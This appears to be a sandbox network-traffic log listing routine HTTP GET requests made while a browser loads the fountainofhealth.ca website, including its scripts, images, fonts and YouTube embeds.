                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/styles/slider1/public/2024-05/Group%209823_0.png?itok=DMkwTIJn HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/safe-blur-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widget-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/fonts/glyphicons-halflings-regular.woff2 HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/css/bootstrap.cssaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/controlgroup-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/form-reset-mixin-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/labels-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/mouse-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/FOH_EN_LOGO_Clr2024.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/checkboxradio-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/draggable-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/resizable-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/button-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/dialog-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/tabbable/index.umd.min.js?v=6.1.2 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/misc/progress.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/bootstrap/js/misc/progress.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/loadjs/loadjs.min.js?v=4.2.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6mcCVPn7U+UYE3l&MD=ceMdVNLn HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
                                  Source: global trafficHTTP traffic detected: GET /core/misc/debounce.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/misc/announce.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/misc/message.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/bootstrap/js/misc/message.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /core/misc/ajax.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/styles/slider1/public/2024-05/Group%209823_0.png?itok=DMkwTIJn HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/bootstrap/js/misc/ajax.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX HTTP/1.1host: www.youtube.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
                                  Source: global trafficHTTP traffic detected: GET /modules/ajax_loader/js/ajax-throbber.js?v=1.x HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /modules/google_analytics/js/google_analytics.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/js/custom.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/js/script.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /embed/h15NcT6UXh0?si=YrXkudamh5IoggTR HTTP/1.1host: www.youtube.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/js/thrivequestion.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws HTTP/1.1host: www.youtube.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
                                  Source: global trafficHTTP traffic detected: GET /themes/custom/foh/js/banner-slider.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
